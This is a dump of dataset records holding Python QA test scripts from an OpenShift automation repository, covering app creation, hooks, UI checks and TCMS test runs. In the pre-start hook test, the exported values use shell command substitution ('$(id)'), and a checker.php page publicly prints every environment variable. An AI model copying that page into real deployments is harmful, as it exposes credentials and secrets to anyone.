connection.createStatement();\n ResultSet rs = statement.executeQuery(\"SELECT * FROM ucctalk\");\n ResultSetMetaData rmeta = rs.getMetaData();\n int numColumns=rmeta.getColumnCount();\n while(rs.next()) {\n context = context + rs.getString(1) + \", \" + rs.getString(2) + \"\\\\\\\\n\";\n }\n rs.close();\n statement.close();\n connection.close();\n\n out.print(context);\n}\n\n\n%%>\nEOF\n git add src/main/webapp/test.jsp && \n git commit -m \"Added test.jsp\" -a &&\n git push\n'''%(self.app_name),\n expect_return=0))\n\n def verify(self):\n url = OSConf.get_app_url(self.app_name)\n r = common.grep_web_page(\"http://%s/test.jsp?action=create\"%url, ['Welcome~','-create-','speaker1, title1'])\n return r\n\n #4\n self.steps_list.append(testcase.TestCaseStep(\"Verify the test.jsp\",\n verify,\n function_parameters = [self],\n expect_return=0))\n\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n case.add_clean_up(\"rm -rf %s\"%(self.app_name))\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(JbossEnvVars)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of jboss_env_vars.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5448225140571594, "alphanum_fraction": 0.5565313100814819, "avg_line_length": 27.46875, "blob_id": "249a1fc95b9029c733d512f1f1556580ad646020", "content_id": "c8de7d31bbc3cbe0525f8537fc7596d68edc3582", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2733, "license_type": "no_license", "max_line_length": 127, "num_lines": 96, "path": "/automation/open/testmodules/RT/cartridge/jgroups.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nAttila Nagy\[email protected]\nMay 4, 2012\n\n[US2114][rhc-cartridge] Update jboss-as7 RPM to include jgroups update for clustering issues\n\"\"\"\n\nimport sys\nimport subprocess\nimport os\n\nimport rhtest\nimport testcase\nimport common\nimport OSConf\nimport re\nfrom time import sleep\nfrom shutil import rmtree\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n self.summary = \"[US2114][rhc-cartridge] Update jboss-as7 RPM to include jgroups update for clustering issues\"\n self.app_name = \"myjboss\" + common.getRandomString()\n\n common.env_setup(cleanup=True)\n\n def finalize(self):\n rmtree(self.app_name, ignore_errors = True)\n \nclass JGroupsTest(OpenShiftTest):\n \n def test_method(self):\n #\n # Step 1\n #\n self.info(\"---------------------------------\")\n self.info(\"1. Create a JBoss application\")\n self.info(\"---------------------------------\")\n ret_code = common.create_app(self.app_name, common.app_types[\"jbossas\"], clone_repo = True)\n self.assert_equal(ret_code, 0, \"Application must be created successfully\")\n\n #\n # Step 2\n #\n self.info(\"---------------------------------\")\n self.info(\"2. Deploy testing application\")\n self.info(\"---------------------------------\")\n ret_code = self.deploy_jgroups_testing_application(\"./\" + self.app_name)\n self.assert_equal(ret_code, 0, \"The application must be deployed successfully\")\n\n # Waiting for the application to stand up\n sleep(30)\n\n #\n # Step 3\n #\n self.info(\"---------------------------------\")\n self.info(\"3. Verify JGroups version number\")\n self.info(\"---------------------------------\")\n user = OSConf.OSConf()\n user.load_conf()\n app_cache = OSConf.get_apps(user)\n app_url = app_cache[self.app_name]['url']\n self.assert_true(\n int(common.fetch_page(app_url + \"/jgroups.jsp\")) > 6148,\n \"JGroups version must be higher than 3.0.4\"\n )\n\n self.passed(self.summary)\n\n\n def deploy_jgroups_testing_application(self, git_repo):\n\n deployment_steps = [\n \"cp -v %s/app_template/jgroups.jsp %s/src/main/webapp/\" % ( os.path.dirname(os.path.abspath(__file__)), git_repo ),\n \"cd %s\" % git_repo,\n \"git add .\",\n \"git commit -a -m testing\",\n \"git push\"\n ]\n\n return common.command_get_status(\" && \".join(deployment_steps))\n \n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(JGroupsTest)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6099397540092468, "alphanum_fraction": 0.6199799180030823, "avg_line_length": 33.64347839355469, "blob_id": "446769bbb9ad6e7910e5471bb9f936b93d9a2867", "content_id": "06f4faa600c947093af86685d5c1d5cc1d2e5c9a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3984, "license_type": "no_license", "max_line_length": 263, "num_lines": 115, "path": "/automation/open/bin/create_test_run.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\nimport os\nimport sys\nimport time\nfile_path = os.path.dirname(os.path.realpath(__file__))\nlib_path = os.path.abspath(file_path + \"/../lib\")\nsys.path.append(lib_path)\nfrom tcms import TCMS, TCMSException\n\n\ntcmsobj = None\n\n\t\n\n\ndef create_test_run(testrun_tag, tc_id_list, testplan_id):\n \"\"\"\n Create TCMS.TestRun according to tc_id_list.\n \"\"\"\n timestamp = time.strftime(\"%Y_%m_%d-%H:%M:%S\", time.localtime())\n test_run_summary = \"Openshift-%s-%s\" %(testrun_tag, timestamp)\n testrun_id = tcmsobj.create_testrun(test_run_summary, plan_id=testplan_id)['run_id']\n # create_domain - 142463; clean_up - 146352\n # This two cases must be added into new test run as the first one, and the last one.\n #update_test_run(testrun_id, [142463])\n update_test_run(testrun_id, tc_id_list) \n #update_test_run(testrun_id, [146352])\n return testrun_id\n \ndef update_test_run(testrun_id, tc_id_list):\n \"\"\"\n Update TCMS.TestRun according to tc_id_list.\n \"\"\"\n if tc_id_list != None and isinstance(tc_id_list, list) and len(tc_id_list) != 0:\n tcmsobj.add_testcase_to_run(tc_id_list, testrun_id)\n return True\n else:\n print \"only support list format for test cases\"\n return False\n\n\n\ndef main():\n global tcmsobj\n\n usage = \"\"\"\nusage: %s -t new_run_tag (-c 'n, ..., m')|(-g 'xxx, ..., zzz') [-p xxx]\n\"\"\" %(os.path.basename(__file__))\n\n from optparse import OptionParser\n parser = OptionParser(usage=usage)\n parser.add_option(\"-t\", \"--testrun_tag\", dest=\"testrun_tag\", help=\"TCMS Arguments: Create new test run with this tag\")\n parser.add_option(\"-i\", \"--testrun_id\", dest=\"testrun_id\", type=int, help=\"TCMS Arguments: Using this existing test run that you want to run.\")\n parser.add_option(\"-c\", \"--testcase_ids\", dest=\"testcase_ids\", help=\"TCMS Arguments: A list of test case ids that you want to execute\")\n parser.add_option(\"-g\", \"--testcase_tags\", dest=\"testcase_tags\", help=\"TCMS Arguments: A list of test case tags that you want to execute\")\n parser.add_option(\"-p\", \"--testplan_id\", dest=\"testplan_id\", default=4962, type=int, help=\"TCMS Arguments: All test cases are selected from this test plan for creating/updating test run. By default it is 4962 - https://tcms.engineering.redhat.com/plan/4962/\")\n\n (options, args) = parser.parse_args()\n #print \"-->\", options\n #print \"-->\", args\n\n\n testplan_id=options.testplan_id\n \n\n #Do TCMS authentication only once\n tcmsobj = TCMS()\n\n tc_id_list = []\n tc_tag_list = []\n if options.testcase_ids != None:\n tmp_list = options.testcase_ids.split(',')\n for i in tmp_list:\n tc_id_list.append(int(i.strip()))\n elif options.testcase_tags != None:\n tmp_list = options.testcase_tags.split(',')\n for i in tmp_list:\n tc_tag_list.append(i.strip())\n #print \"--->\", tc_tag_list\n\n\n\n # Priority for test case filter arguments: -c -> -g\n if options.testrun_tag != None: \n if len(tc_id_list) != 0:\n test_run_id = create_test_run(options.testrun_tag, tc_id_list, testplan_id)\n print \"test_run_id=%s\" %(test_run_id)\n elif len(tc_tag_list) != 0:\n tc_id_list = tcmsobj.get_testcase_id_list_by_tag(tc_tag_list, testplan_id)\n test_run_id = create_test_run(options.testrun_tag, tc_id_list, testplan_id)\n print \"test_run_id=%s\" %(test_run_id)\n else:\n print usage\n raise Exception(\"Entry test case id list using option '-c' or test case tag list using option '-g'\")\n else:\n print usage\n raise Exception(\"Create new TCMS test run using option '-t'\")\n\n return test_run_id\n\n\ndef error(msg):\n print >> sys.stderr,\"ERROR: \",msg\n\ndef info(msg):\n print >> sys.stderr,\"INFO: \",msg\n\ndef debug(msg):\n print >> sys.stderr,\"DEBUG: \",msg\n\ndef debug2(msg):\n print >> sys.stderr,\"DEBUG: \",msg\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.5273402333259583, "alphanum_fraction": 0.5331908464431763, "avg_line_length": 33.18077087402344, "blob_id": "320f2da97d05014cc2442ac4def1b5c993027566", "content_id": "07bf075d67690cb62e50099002e6c1a5dd5d5947", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8888, "license_type": "no_license", "max_line_length": 108, "num_lines": 260, "path": "/automation/open/testmodules/RT/cartridge/PreStartScript.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#\n# File name: PreStartScript.py\n# Date: 2012/07/26 15:03\n# Author: [email protected]\n#\n\nimport common\nimport rhtest\nimport OSConf\nimport re\n\n\nclass OpenShiftTest(rhtest.Test):\n ITEST = [\"DEV\"]\n\n def initialize(self):\n self.info(\"[US2008][RT] Check running pre-start script\")\n self.timeout=5\n\n try:\n self.test_variant = self.get_variant()\n except:\n self.test_variant = 'php'\n self.info(\"VARIANT: %s\"%self.test_variant)\n\n try:\n self.cart_variant = self.config.tcms_arguments['cartridge']\n except:\n self.cart_variant = 'mysql'\n self.info(\"DB VARIANT: %s\"%self.cart_variant)\n\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.app_name = common.getRandomString(10)\n self.custom_app_vars={\n \"QE_ID_APP\": \"$(id)\",\n \"TESTING_STRING_%s\"%self.test_variant: 1,\n \"QE_APP\": 1\n }\n\n self.custom_cart_vars={\n \"QE_ID_CART\": \"$(id)\",\n \"MYSQL_PS1\": \"qashift \",\n \"TESTING_STRING_%s\"%self.cart_variant: 1,\n \"sleep\": \"$(sleep %s)\"%self.timeout,\n \"QE_CART\": 1\n }\n dict2list = lambda dic: [(k, v) for (k, v) in dic.iteritems()]\n\n self.custom_app_commands= \"\\n\".join(\n map(lambda item: (\"export %s=%s\"%(item[0],item[1])), dict2list(self.custom_app_vars)))\n self.custom_cart_commands= \"\\n\".join(\n map(lambda item: (\"export %s=%s\"%(item[0],item[1])), dict2list(self.custom_cart_vars)))\n #self.custom_cart_commands += \"\\nblabla\"\n\n self.hook_app_file = \"%s/.openshift/action_hooks/pre_start_%s\"%(\n self.app_name, common.app_types[self.test_variant])\n self.hook_cart_file = \"%s/.openshift/action_hooks/pre_start_%s\"%(\n self.app_name, common.cartridge_types[self.cart_variant])\n\n common.env_setup()\n\n\n def finalize(self):\n pass\n\n\nclass PreStartScript(OpenShiftTest):\n def test_method(self):\n\n self.add_step(\"Create an app\", \n common.create_app,\n function_parameters=[self.app_name,\n common.app_types[self.test_variant],\n self.user_email, \n self.user_passwd, \n True],\n expect_return=0)\n\n self.add_step(\"Embed a cartridge\", \n common.embed,\n function_parameters=[self.app_name,\n \"add-%s\"%common.cartridge_types[self.cart_variant], \n self.user_email, \n self.user_passwd],\n expect_return=0)\n\n self.add_step(\"Add pre-start script for %s\"%self.test_variant,\n \"echo '%s' > %s\"%\n (self.custom_app_commands, self.hook_app_file),\n expect_return=0)\n\n self.add_step(\"Put the testing script online\",\n self.upload_checker_file,\n expect_return = True)\n\n #for app only\n self.add_step(\"Git add/commit/push [App+Cartridge]\",\n \"cd %s && git add . && git commit -m new_files -a && git push\"%\n (self.app_name),\n expect_description = \"Only app hook should be executed\",\n expect_str = [ \n# \"blabla: command not found\", \n \"remote: Done\"],\n expect_return=0)\n\n self.add_step(\"Check the app url\",\n common.check_web_page_output,\n function_parameters=[self.app_name],\n try_count=3,\n expect_return=0)\n\n self.add_step(\"Check the variables remotely [APP]\",\n self.check_variables,\n function_parameters=[self.custom_app_vars.keys()],\n expect_description = \"All of the variables must be in rhcsh shell.\",\n expect_return=True)\n\n #add cartridge hook\n self.add_step(\"Add pre-start script for %s\"%self.cart_variant,\n \"echo '%s'> %s\"%\n (self.custom_cart_commands, self.hook_cart_file),\n expect_return=0)\n\n #for both of them...\n self.add_step(\"Git add/commit/push [BOTH]\",\n \"cd %s && git add . && git commit -m update_hooks -a && git push\"%\n (self.app_name),\n expect_description = \"Both hooks should be executed\",\n expect_str = [\n \"remote: Done\"],\n expect_return=0)\n\n self.add_step(\"Check the app url\",\n common.check_web_page_output,\n function_parameters=[self.app_name],\n try_count=3,\n expect_return=0)\n\n self.add_step(\"Check the variables remotely [APP]\",\n self.check_variables,\n function_parameters=[self.custom_app_vars.keys()],\n expect_description = \"All of the app+cart variables must be in rhcsh shell.\",\n expect_return=True)\n\n #only for CART, no PHP\n self.add_step(\"Remove APP pre-start script\",\n \"cd %s && git rm -f %s \"%(self.app_name, self.hook_app_file.replace(self.app_name,\".\")),\n expect_return=0)\n\n self.add_step(\"Git add/commit/push [CART]\",\n \"cd %s && git add . && git commit -m update_hooks -a && git push\"%\n (self.app_name),\n expect_description = \"Only cartridge hook should be loaded\",\n expect_str = [\"remote: Done\"],\n expect_return=0)\n\n self.add_step(\"Check the app url\",\n common.check_web_page_output,\n function_parameters=[self.app_name],\n try_count=3,\n expect_return=0)\n\n self.add_step(\"Check the output remotely\",\n common.run_remote_cmd_as_root,\n expect_description = \"`Timeout' warning message should be present in the output of libra start\",\n function_parameters=[\"/sbin/service libra restart | grep Timeout\"],\n expect_return=0)\n\n self.add_step(\"Check the app url\",\n common.check_web_page_output,\n function_parameters=[],\n expect_return=0)\n\n self.add_step(\"Check the variables remotely [APP]\",\n self.check_variables,\n function_parameters=[self.custom_app_vars.keys()],\n expect_description = \"All of the app+cart variables must be in rhcsh shell.\",\n expect_return=True)\n\n self.custom_app_commands += \"\\nblabla\"\n\n self.add_step(\"Add pre-start script for %s\"%self.test_variant,\n \"echo '%s' > %s\"%\n (self.custom_app_commands, self.hook_app_file),\n expect_return=0)\n\n self.add_step(\"Git add/commit/push [APP+ERROR]\",\n \"cd %s && git add . && git commit -m update_hooks -a && git push\"%\n (self.app_name),\n expect_description = \"Only cartridge hook should be loaded\",\n expect_str = [\n \"blabla: command not found\", \n \"remote: Done\"],\n expect_return=0)\n\n self.add_step(\"Check the app url\",\n common.check_web_page_output,\n expect_description = \"App shouldn't be accessible because of error\",\n function_parameters=[self.app_name],\n expect_return=1)\n\n self.add_step(\"Check the variables remotely [APP]\",\n self.check_variables,\n function_parameters=[self.custom_app_vars.keys()],\n expect_description = \"Shouldn't be accessible.\",\n expect_return=False)\n\n self.run_steps()\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n def check_variables(self, *vars_to_check):\n app_url = OSConf.get_app_url(self.app_name)\n output = common.fetch_page(app_url+\"/checker.php\")\n for arr in vars_to_check:\n for var in arr:\n obj = re.search(r\"%s=\"%var, output)\n if not obj:\n self.error(\"Unable to find %s in environemnt\"%var)\n return False\n return True\n\n def upload_checker_file(self):\n fname = \"%s/php/checker.php\"%self.app_name\n checker = \"\"\"\n<?php\necho \"List of all \\$_ENV variables\\n\";\n\nforeach ($_ENV as $key => $val) {\n echo \"$key=$val\";\n}\n?>\n \"\"\"\n try:\n f = open(fname, \"wb\")\n f.write(checker)\n f.close()\n except:\n return False\n return True\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(PreStartScript)\n return suite\n\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of PreStartScript.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6233766078948975, "alphanum_fraction": 0.6517857313156128, "avg_line_length": 20.224138259887695, "blob_id": "b80d33b30e1ec03cff5c5b3c794d371f4701be3c", "content_id": "f48ef323aba33c95fbcb8d2a0d30d90b16207583", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1232, "license_type": "no_license", "max_line_length": 119, "num_lines": 58, "path": "/automation/open/testmodules/UI/web/case_167511.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_167511.py\n# Date: 2012/08/13 11:23\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass CheckCommunityLinkForUserAppRequest(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n\n web.login()\n \n #create a python app\n web.go_to_create_app(\"\")\n\n web.click_element_by_link_text(\"suggest or vote for it\")\n web.assert_text_equal_by_xpath('''Vote on Features''','''//div[@id='content']/div/div/div/div[3]/div/h1/div''')\n\n\n self.tearDown()\n\n return self.passed(\" case_167511--CheckCommunityLinkForUserAppRequest passed successfully.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CheckCommunityLinkForUserAppRequest)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_167511.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.7191780805587769, "alphanum_fraction": 0.7315068244934082, "avg_line_length": 25.071428298950195, "blob_id": "393efac695bc21a746fdfcd62ca01a79b51e75fb", "content_id": "07ba83b689cc74ec699e425bd73f5fd959594fd7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 730, "license_type": "no_license", "max_line_length": 114, "num_lines": 28, "path": "/automation/open/testmodules/RT/hot_deploy/jbossews_scaling_with_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nNov 6, 2012\n\"\"\"\n\nimport rhtest\nimport common\nfrom jbossews_scaling_without_jenkins import EWSScalingHotDeployWithoutJenkins\n\nclass EWSScalingHotDeployWithJenkins(EWSScalingHotDeployWithoutJenkins):\n def __init__(self, config):\n EWSScalingHotDeployWithoutJenkins.__init__(self, config)\n self.config.jenkins_is_needed = True\n self.config.summary = \"[US2513] Hot deployment support for scalable application - with Jenkins - jbossEWS\"\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(EWSScalingHotDeployWithJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6509762406349182, "alphanum_fraction": 0.6804221868515015, "avg_line_length": 84.35134887695312, "blob_id": "c85479e5a0fa96bf1b25dc9dff8dc57116892a99", "content_id": "d5ba9e64f23e01130e3331de573f0747ad3724d5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9475, "license_type": "no_license", "max_line_length": 483, "num_lines": 111, "path": "/automation/open/testmodules/UI/web/case_163035.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_163035.py\n# Date: 2012/07/25 10:56\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass Check_Cartridge_List(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n web.login()\n \n #Create duplicate domain\n web.go_to_developer()\n time.sleep(5)\n web.click_element_by_link_text(\"Platform Features\")\n time.sleep(5)\n web.assert_text_equal_by_xpath('''OpenShift Platform Features''', '''//div[@id='content']/div/div/div/div[3]/div/h1/div''') \n web.assert_text_equal_by_xpath('''OpenShift supports a wide list of application technologies. Each technology is delivered as a cartridge -- a pluggable capability you can add at any time. When you create an application you start with a web platform cartridge and then can add additional capabilities as you choose. Each cartridge runs on one or more gears depending on how high your application has been scaled.''', '''//div[@id='node-10863']/div/p''') \n web.assert_text_equal_by_xpath('''Web Cartridges''', '''//div[@id='node-10863']/div/h2''')\n web.assert_text_equal_by_xpath('''Web cartridges handle HTTP requests and serve web pages or business APIs. The OpenShift servers route traffic to your application's cartridge, and your code does the rest. If you need a place to store data, adding a database or NoSQL cartridge will automatically configure your web cartridge with the right access.''', '''//div[@id='node-10863']/div/p[2]''')\n web.click_element_by_link_text(\"JBoss Enterpise Application Platform 6.0\") \n time.sleep(2)\n web.check_title(\"OpenShift Resources for JBoss | OpenShift by Red Hat\")\n web.go_back()\n web.assert_text_equal_by_xpath('''Market-leading open source enterprise platform for next-generation, highly transactional enterprise Java applications. Build and deploy enterprise Java in the cloud.''', '''//div[@id='node-10863']/div/table/tbody/tr/td[2]''')\n web.click_element_by_link_text(\"JBoss Application Server 7.1\")\n web.check_title(\"OpenShift Resources for JBoss | OpenShift by Red Hat\")\n web.go_back() \n web.assert_text_equal_by_xpath('''PHP 5.3''', '''//div[@id='node-10863']/div/table/tbody/tr[3]/td''') \n web.assert_text_equal_by_xpath('''PHP is a general-purpose server-side scripting language originally designed for Web development to produce dynamic Web pages. The mod_php Apache module is used to execute PHP applications. Popular development frameworks include: CakePHP, Symfony, and Code Igniter. Popular applications include: Drupal, Wordpress, and Mediawiki.''', '''//div[@id='node-10863']/div/table/tbody/tr[3]/td[2]''')\n web.assert_text_equal_by_xpath('''Python 2.6''', '''//div[@id='node-10863']/div/table/tbody/tr[4]/td''') \n web.assert_text_equal_by_xpath('''Python is a general-purpose, high-level programming language whose design philosophy emphasizes code readability. The Web Server Gateway Interface (WSGI) defines a simple and universal interface between web servers and web applications or frameworks for the Python programming language. Popular development frameworks include: Django, Bottle, Pylons, Zope and TurboGears.''', '''//div[@id='node-10863']/div/table/tbody/tr[4]/td[2]''')\n web.assert_text_equal_by_xpath('''Perl 5.10''', '''//div[@id='node-10863']/div/table/tbody/tr[5]/td''') \n web.assert_text_equal_by_xpath('''Perl is a high-level, general-purpose, interpreted, dynamic programming language. mod_perl is an optional module for the Apache HTTP server. It embeds a Perl interpreter into the Apache server, so that dynamic content produced by Perl scripts can be served in response to incoming requests, without the significant overhead of re-launching the Perl interpreter for each request.''', '''//div[@id='node-10863']/div/table/tbody/tr[5]/td[2]''')\n web.assert_text_equal_by_xpath('''Node.js 0.6''', '''//div[@id='node-10863']/div/table/tbody/tr[6]/td''') \n web.assert_text_equal_by_xpath('''Node.js is a platform built on Chrome's JavaScript runtime for easily building fast, scalable network applications. Node.js uses an event-driven, non-blocking I/O model that makes it lightweight and efficient, perfect for data-intensive real-time applications that run across distributed devices.''', '''//div[@id='node-10863']/div/table/tbody/tr[6]/td[2]''') \n web.assert_text_equal_by_xpath('''Ruby 1.9.3 and 1.8.7''', '''//div[@id='node-10863']/div/table/tbody/tr[7]/td''')\n web.assert_text_equal_by_xpath('''Ruby is a dynamic, reflective, general-purpose object-oriented programming language. Rack provides a minimal, modular and adaptable interface for developing web applications in Ruby. Popular development frameworks include: Ruby on Rails and Sinatra.''', '''//div[@id='node-10863']/div/table/tbody/tr[7]/td[2]''') \n web.assert_text_equal_by_xpath('''Do-It-Yourself''', '''//div[@id='node-10863']/div/table/tbody/tr[8]/td''')\n web.assert_text_equal_by_xpath('''The Do-It-Yourself (DIY) application type is a blank slate for trying unsupported languages, frameworks, and middleware on OpenShift. See the community site for examples of bringing your favorite framework to OpenShift.''', '''//div[@id='node-10863']/div/table/tbody/tr[8]/td[2]''')\n web.assert_text_equal_by_xpath('''Databases''', '''//div[@id='node-10863']/div/h2[2]''')\n web.go_back()\n web.assert_text_equal_by_xpath('''MongoDB is a scalable, high-performance, open source NoSQL database.''', '''//div[@id='node-10863']/div/table[2]/tbody/tr/td[2]''')\n web.assert_text_equal_by_xpath('''MySQL Database 5.1''', '''//div[@id='node-10863']/div/table[2]/tbody/tr[2]/td''')\n web.assert_text_equal_by_xpath('''MySQL is a multi-user, multi-threaded SQL database server.''', '''//div[@id='node-10863']/div/table[2]/tbody/tr[2]/td[2]''')\n web.assert_text_equal_by_xpath('''MySQL Database 5.1''', '''//div[@id='node-10863']/div/table[2]/tbody/tr[2]/td''')\n web.assert_text_equal_by_xpath('''PostgreSQL Database 8.4''', '''//div[@id='node-10863']/div/table[2]/tbody/tr[3]/td''')\n web.assert_text_equal_by_xpath('''PostgreSQL is an advanced Object-Relational database management system''', '''//div[@id='node-10863']/div/table[2]/tbody/tr[3]/td[2]''')\n web.assert_text_equal_by_xpath('''Administration''', '''//div[@id='node-10863']/div/h2[3]''')\n web.assert_text_equal_by_xpath('''phpMyAdmin 3.4''', '''//div[@id='node-10863']/div/table[3]/tbody/tr/td''') \n web.assert_text_equal_by_xpath('''Web based MySQL admin tool. Requires the MySQL cartridge to be installed first.''', '''//div[@id='node-10863']/div/table[3]/tbody/tr/td[2]''') \n web.assert_text_equal_by_xpath('''RockMongo 1.1''', '''//div[@id='node-10863']/div/table[3]/tbody/tr[2]/td''')\n web.assert_text_equal_by_xpath('''Web based MongoDB administration tool. Requires the MongoDB cartridge to be installed first.''', '''//div[@id='node-10863']/div/table[3]/tbody/tr[2]/td[2]''')\n web.assert_text_equal_by_xpath('''Developer Productivity''', '''//div[@id='node-10863']/div/h2[4]''')\n web.click_element_by_link_text(\"Jenkins Server\")\n web.check_title(\"Build with Jenkins | OpenShift by Red Hat\")\n web.go_back()\n web.assert_text_equal_by_xpath('''Jenkins is a continuous integration (CI) build server that is deeply integrated into OpenShift. When you add Jenkins as an application you will enable your other applications to run complex builds whenever you push code. See the Jenkins info page for more.''', '''//div[@id='node-10863']/div/table[4]/tbody/tr/td[2]''')\n web.click_element_by_link_text(\"the Jenkins info page for more\")\n web.check_title(\"Build with Jenkins | OpenShift by Red Hat\")\n web.go_back()\n web.click_element_by_link_text(\"Jenkins Client 1.4\")\n web.check_title(\"Build with Jenkins | OpenShift by Red Hat\")\n web.go_back()\n web.assert_text_equal_by_xpath('''The Jenkins client connects to your Jenkins application and enables builds and testing of your application. Requires the Jenkins Application to be created via the new application page.''', '''//div[@id='node-10863']/div/table[4]/tbody/tr[2]/td[2]''')\n web.click_element_by_link_text(\"created via the new application page\")\n web.check_title(\"OpenShift by Red Hat\")\n web.go_back()\n web.assert_text_equal_by_xpath('''Cron 1.4''', '''//div[@id='node-10863']/div/table[5]/tbody/tr/td''') \n web.assert_text_equal_by_xpath('''The Cron cartridge allows you to run command line programs at scheduled times. Use this for background jobs and periodic processing.''', '''//div[@id='node-10863']/div/table[5]/tbody/tr/td[2]''') \n \n\n self.tearDown()\n\n return self.passed(\"Case 163035 test passed.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(Check_Cartridge_List)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_163035.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5925925970077515, "alphanum_fraction": 0.6037898659706116, "avg_line_length": 30.37837791442871, "blob_id": "b09cb5880be777ae5f74f2ae6b1da2ce5cfd8177", "content_id": "6fb16fc57d2344e733519561134d47c25b5385a8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2322, "license_type": "no_license", "max_line_length": 93, "num_lines": 74, "path": "/automation/open/testmodules/RT/cartridge/local_lib_mirrors_python.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nLinqing Lu\[email protected]\nDec 12, 2011\n\n[US1309][rhc-cartridge]Create local lib mirrors for Python framework\nhttps://tcms.engineering.redhat.com/case/122396/\n\"\"\"\nimport os,sys,re\nimport rhtest\n#import database\n# user defined packages\nimport openshift\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nimport testcase\nimport common\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"[US1309][rhc-cartridge]Create local lib mirrors for Python framework\"\n self.app = { 'name':'pythontest', 'type':common.app_types['python'] }\n self.steps_list = []\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s; \"%(self.app['name']))\n\nclass LocalMirrorsPython(OpenShiftTest):\n def test_method(self):\n self.steps_list.append(testcase.TestCaseStep(\n \"Create an %s app: %s\" % (self.app['type'],self.app['name']),\n common.create_app,\n function_parameters = [self.app['name'], self.app['type']],\n expect_description = \"App should be created successfully\",\n expect_return = 0))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Enable install_requires = ['Django>=1.3']\",\n \"sed -i '9s/^#//' %s/setup.py\" % self.app['name'],\n expect_return = 0))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Git push codes\",\n \"cd %s && git commit -am test && git push\" % self.app['name'],\n expect_string_list = ['Installed.+Django', 'Reading http.*python'],\n expect_return = 0))\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass 